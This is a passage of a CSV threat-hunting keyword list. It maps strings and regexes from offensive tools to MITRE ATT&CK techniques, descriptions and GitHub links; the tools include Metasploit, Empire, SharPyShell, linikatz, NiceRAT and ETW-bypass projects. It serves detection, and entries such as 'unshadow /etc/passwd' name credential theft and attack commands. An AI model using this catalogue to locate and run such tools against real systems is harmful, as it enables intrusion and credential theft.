T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*Unit-259/DataBouncing*",".{0,1000}Unit\-259\/DataBouncing.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*unix/1.0 UPnP/1.1 masscan/*",".{0,1000}unix\/1\.0\sUPnP\/1\.1\smasscan\/.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*unix_cached_ad_hashes.rb*",".{0,1000}unix_cached_ad_hashes\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*unix_kerberos_tickets.rb*",".{0,1000}unix_kerberos_tickets\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*unixpickle*",".{0,1000}unixpickle.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting obfuscation tools","N/A","N/A","N/A","N/A","Defense Evasion","https://github.com/unixpickle","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*UnkL4b/BabyShark*",".{0,1000}UnkL4b\/BabyShark.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*unknown mythic client configuration setting: *",".{0,1000}unknown\smythic\sclient\sconfiguration\ssetting\:\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*unkvolism/Fuck-Etw*",".{0,1000}unkvolism\/Fuck\-Etw.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*unlink -- tells the current rat to disconnect from a child rat given a local file or UNC path*",".{0,1000}unlink\s\-\-\stells\sthe\scurrent\srat\sto\sdisconnect\sfrom\sa\schild\srat\sgiven\sa\slocal\sfile\sor\sUNC\spath.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*UnlinkDLL.exe*",".{0,1000}UnlinkDLL\.exe.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*UnlinkDLL\Main.nim*",".{0,1000}UnlinkDLL\\Main\.nim.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","0","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*UnlinkDLL\Structs.nim*",".{0,1000}UnlinkDLL\\Structs\.nim.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","0","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*UnlinkDLL-main*",".{0,1000}UnlinkDLL\-main.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*unmanagedPowershell */command*",".{0,1000}unmanagedPowershell\s.{0,1000}\/command.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*unmarshal_cmd_exec.*",".{0,1000}unmarshal_cmd_exec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*UnmarshalPwn.*",".{0,1000}UnmarshalPwn\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*UnmarshalPwn.exe*",".{0,1000}UnmarshalPwn\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*unode/firefox_decrypt*",".{0,1000}unode\/firefox_decrypt.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1811","293","2024-04-07T20:04:37Z","2014-01-17T13:25:02Z" "*Unpacking Successful!\n\nExecuting from Memory >>>> *",".{0,1000}Unpacking\sSuccessful!\\n\\nExecuting\sfrom\sMemory\s\>\>\>\>\s.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*UnquotedPath.csproj*",".{0,1000}UnquotedPath\.csproj.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*UnquotedPath.exe*",".{0,1000}UnquotedPath\.exe.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*unshackle --*",".{0,1000}unshackle\s\-\-.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*unshackle-main*",".{0,1000}unshackle\-main.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*unshackle-v1.0.iso*",".{0,1000}unshackle\-v1\.0\.iso.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*unshadow /etc/passwd*",".{0,1000}unshadow\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*unshadow passwd shadow*",".{0,1000}unshadow\spasswd\sshadow.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*untested_payloads.rb*",".{0,1000}untested_payloads\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*UnwindInspector.exe*",".{0,1000}UnwindInspector\.exe.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*unzip websites.zip -d sites > /dev/null*",".{0,1000}unzip\swebsites\.zip\s\-d\ssites\s\>\s\/dev\/null.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*UP104D7060F113(*",".{0,1000}UP104D7060F113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*UP104D70K3N(*",".{0,1000}UP104D70K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*update_vba_file_url_droppingPath(*",".{0,1000}update_vba_file_url_droppingPath\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*Update-ExeFunctions*",".{0,1000}Update\-ExeFunctions.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*update-rc.d tor2web defaults*",".{0,1000}update\-rc\.d\stor2web\sdefaults.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*Upload it to the target server and let\\'s start having some fun :) *",".{0,1000}Upload\sit\sto\sthe\starget\sserver\sand\slet\\\\\'s\sstart\shaving\ssome\sfun\s\:\)\s.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*upload.nolog.cz*",".{0,1000}upload\.nolog\.cz.{0,1000}","offensive_tool_keyword","upload.nolog.cz","sharing platform","T1567.002","TA0010","N/A","N/A","Data Exfiltration","https://upload.nolog.cz/","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*upload-dll * *.dll*",".{0,1000}upload\-dll\s.{0,1000}\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*UploadFileImplant*",".{0,1000}UploadFileImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Uploading encrypted ps module.*",".{0,1000}Uploading\sencrypted\sps\smodule\..{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Uploading Juicy Potato binary*",".{0,1000}Uploading\sJuicy\sPotato\sbinary.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Uploading malicious DLL via SMB*",".{0,1000}Uploading\smalicious\sDLL\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*Uploading malicious SCNotification.exe.config via SMB*",".{0,1000}Uploading\smalicious\sSCNotification\.exe\.config\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*Uploading mimikatz binary*",".{0,1000}Uploading\smimikatz\sbinary.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*UrbanBishop.exe*",".{0,1000}UrbanBishop\.exe.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*Uri3n/Thread-Pool-Injection-PoC*",".{0,1000}Uri3n\/Thread\-Pool\-Injection\-PoC.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","1","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*URL must be provided for GIF embedding!*",".{0,1000}URL\smust\sbe\sprovided\sfor\sGIF\sembedding!.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*URL must be provided for PNG embedding!*",".{0,1000}URL\smust\sbe\sprovided\sfor\sPNG\sembedding!.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*ursnif_IcedID.profile*",".{0,1000}ursnif_IcedID\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*USBPcap*",".{0,1000}USBPcap.{0,1000}","offensive_tool_keyword","usbpcap","USB capture for Windows.","T1115 - T1129 - T1052","TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*use exploit/*",".{0,1000}use\sexploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*use exploit/windows/*",".{0,1000}use\sexploit\/windows\/.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*use implant/*",".{0,1000}use\simplant\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*use incognito*",".{0,1000}use\sincognito.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Use nmap --script http-ntlm-info *",".{0,1000}Use\snmap\s\-\-script\shttp\-ntlm\-info\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*use powershell_stageless*",".{0,1000}use\spowershell_stageless.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*use 